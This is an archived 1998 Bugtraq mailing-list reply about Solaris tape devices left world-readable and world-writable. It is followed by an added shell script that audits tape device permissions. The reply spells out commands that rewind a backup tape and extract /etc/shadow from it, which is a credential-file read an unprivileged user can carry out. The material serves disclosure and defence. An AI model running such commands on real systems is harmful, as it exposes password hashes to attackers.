Bugtraq mailing list archives

Re: solaris tape dev permission stupidity
From: rob () RPI NET AU (Robert Thomas)
Date: Thu, 22 Oct 1998 12:17:54 +1000

joshua grubman wrote:
under solaris, scsi tape devices (/dev/rmt/*, which are linked to the st@x,x:
devs in /devices) are created with the permissions bits set to 666. this allows
a malicious user with a login on your system to 'mt erase' the contents of any
tape devices connected to your system.

It's not that simple.  Say, for example, you, the unix administrator, as a good
boy/girl, do a daily backup... That backup is written to the tape. All is
well and good. You leave your desk, and start to wander over to the computer
room, to pull the tape out of the drive.  In that time, someone's done:

lamer@leeto$ cd
lamer@leeto$ mt -f /dev/nrmt/0h rewind
lamer@leeto$ tar xvf /dev/nrmt/0h etc/shadow
lamer@leeto$ cd etc
lamer@leeto$ more shadow
..shadow password entry..

and your shadow password file is open to the world.

Just one, of many, bad-things(tm) that can be done with lame-arsed tape

--Rob Thomas
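
A check for the condition this thread describes, as an added example that is not part of either post: it walks a directory of tape device links, follows each link to the real node, and reports any node that "other" can read or write. The function name, output format and exit-status convention are assumptions made for the example; the mode is parsed from `ls -ldL` so the check does not depend on a `stat` command being present.

```shell
#!/bin/sh
# Added example: flag tape device nodes that are world-readable or
# world-writable (the mode 666 case discussed in the thread).

# audit_tape_perms DIR
#   DIR is a directory of device links, e.g. /dev/rmt.
#   Prints one line per entry whose target grants read or write to "other".
#   Returns 1 if at least one such entry exists, 0 if none do.
audit_tape_perms() {
    dir=$1
    found=0
    for link in "$dir"/*; do
        # Skip an unmatched glob or a dangling link.
        [ -e "$link" ] || continue
        # -L makes ls report the mode of the link target, which is the
        # mode the kernel checks on open(); the link's own mode is irrelevant.
        # Keep only the 10-character mode string (drops any ACL marker).
        perms=$(ls -ldL "$link" | cut -c1-10)
        # Characters 8 and 9 are the read and write bits for "other".
        other=$(printf '%s' "$perms" | cut -c8-9)
        case $other in
            --) ;;  # neither world-readable nor world-writable
            *)  printf 'WORLD-ACCESSIBLE %s %s\n' "$perms" "$link"
                found=1 ;;
        esac
    done
    return $found
}

# Run the audit when a directory is given on the command line,
# e.g.:  sh audit_tape.sh /dev/rmt
if [ $# -gt 0 ]; then
    audit_tape_perms "$1"
fi
```

The non-zero exit status lets the check run from cron or a configuration-management job and raise an alert when device nodes are recreated with open permissions.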
